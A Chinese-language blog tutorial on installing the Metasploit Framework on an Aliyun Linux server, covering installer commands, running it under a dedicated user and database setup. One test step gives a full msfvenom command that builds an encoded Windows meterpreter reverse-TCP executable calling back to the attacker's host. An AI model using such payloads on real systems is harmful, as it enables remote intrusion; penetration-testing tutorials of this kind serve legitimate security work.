linux系統安裝msf的過程詳解
還是自己寫下安裝過程吧!
我的服務器系統是 Aliyun linux
1、下載安裝curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
可能報錯:Couldn’t open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
是因為安裝庫的問題!解決方法:yum install -y epel-release然后再重復上面那條命令!
2、添加新用戶運行msfadduser msf #添加msf用戶su msf#切換到msf用戶cd /opt/metasploit-framework/bin #切換到msf所在的目錄./msfconsole#以后啟動msfconsole,都切換到msf用戶下啟動,這樣會同步數據庫。如果使用root用戶啟動的話,不會同步數據庫!(啟動索引已經默認配好了!)直接 msfconsole 就可以啟動了!
#相關命令[msf@xxxx root]$ msfmsfbinscan msfconsole msfd msfdb msfelfscan msfmachscan msfpescan msfrop msfrpc msfrpcd msfupdate msfvenom#數據庫初始化[msf@xxxx root]$ msfdbCommands: init initialize the component reinit delete and reinitialize the component delete delete and stop the component status check component status start start the component stop stop the component restart restart the component
#測試:e.g.我的虛擬主機是 Win2003(目標機)msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=msf_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > test.exe
注:如果是彈性云服務器IP,LHOST 要設置為內網分配IP,不能設公網IP [被這個坑折騰好久!!!吐血!!!]
ps:linux系統下安裝msf框架
命令:
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.runchmod 755 metasploit-latest-linux-installer.run./metasploit-latest-linux-installer.run
等待運行結束即可。關鍵地方按回車和Y即可。
總結
到此這篇關于linux系統安裝msf的過程詳解的文章就介紹到這了,更多相關linux系統安裝msf內容請搜索好吧啦網以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持好吧啦網!
相關文章:
1. 世界上最流行的操作系統不是Linux或者Windows,而是MINIX2. mac程序沒反應怎么辦 mac強制關閉程序的方法3. Win7想要更換IP不會操作怎么辦?更換系統IP的教程4. Win10跨設備共享就近共享如何使用和關閉?Win10跨設備共享就近共享使用方法5. Win7系統不是正版怎么辦?暫時激活win7旗艦版的教程6. Win7磁盤整理碎片怎么操作?Windows7磁盤碎片整理教程7. Win10系統360瀏覽器搜索引擎被劫持解決方法 8. 統信UOS系統怎么禁止窗口特效? 統信關閉窗口特效的技巧9. uos如何安裝微信? uos系統微信的安裝教程10. 如何在Win11系統上刪除本地用戶?Win11刪除本地用戶教程方法
